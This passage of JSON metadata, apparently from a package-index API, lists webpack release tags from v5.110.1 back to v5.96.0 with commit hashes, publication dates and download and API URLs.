"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id